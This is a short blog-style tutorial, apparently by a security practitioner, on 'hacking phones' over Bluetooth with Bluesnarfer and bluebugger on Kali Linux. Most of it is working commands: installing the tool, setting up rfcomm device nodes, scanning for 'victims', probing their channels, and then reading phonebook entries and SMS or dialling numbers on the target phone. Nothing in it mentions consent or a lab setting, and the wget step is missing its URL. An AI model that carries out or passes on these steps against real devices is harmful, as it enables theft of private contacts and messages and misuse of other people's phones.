
(Kali Linux Tutorial) How To Hack Phones With Bluetooth!

A brief tutorial on how to hack a phone via Bluetooth using Bluesnarfer. For Backtrack/Kali Linux: first, we must install Bluesnarfer. Make your way to the /opt directory.

cd /opt

Get Bluesnarfer using the wget command:

/opt# wget

List the directory using the ls command and you will see Bluesnarfer in there. Now we have to extract it.

/opt# ls

To extract it, we use the simple tar xvf command:

/opt# tar xvf bluesnarfer.tar.gz

List the directory once again and you will see the extracted Bluesnarfer folder there:

/opt# ls

Let’s enter that folder:

/opt# cd bluesnarfer

Now we finish the installation by compiling it:

/opt/bluesnarfer# make

To see all of the Bluesnarfer commands, run ./bluesnarfer:

/opt/bluesnarfer# ./bluesnarfer

Now that we have Bluesnarfer, you must configure rfcomm first, if you haven’t already done that:

mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod --mode=666 /dev/rfcomm0 c 216 0
hciconfig hci0 up
hciconfig hci0

(Scan for victims)

hcitool scan hci0

(Ping the victim to see if he is awake)

l2ping <victim mac addr>

(Browse the victim for rfcomm channels to connect to)

sdptool browse --tree --l2cap <mac addr>

(Then you can use bluesnarfer, for example, to read the victim’s phonebook, dial a number, read SMS, or other things.)

bluesnarfer -r 1-100 -C 7 -b <mac addr>

(To see the available options)

bluebugger -h

(Dial a number)

bluebugger -m <victim name> -c 7 -a <mac addr> Dial <number>

Extra: This is what the Bluesnarfer usage output should look like:

bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr
ATCMD: valid AT+CMD (GSM EXTENSION)
TYPE: valid phonebook type ..
example: "DC" (dialed call list)
"SM" (SIM phonebook)
"RC" (recevied call list)
"XX" much more
-b bdaddr: Bluetooth device address
-C chan: Bluetooth rfcomm channel
-c ATCMD: custom action
-r N-M: read phonebook entry N to M
-w N-M: delete phonebook entry N to M
-f name: search "name" in phonebook address
-s TYPE: select phonebook memory storage
-l: list available phonebook memory storage
-i: device info

If you have any questions regarding Bluetooth hacking or need help capturing packets or anything specific make sure to post your thread here:

Noor Qureshi

Experienced Founder with a demonstrated history of working in the computer software industry. Skilled in Network Security and Information Security.
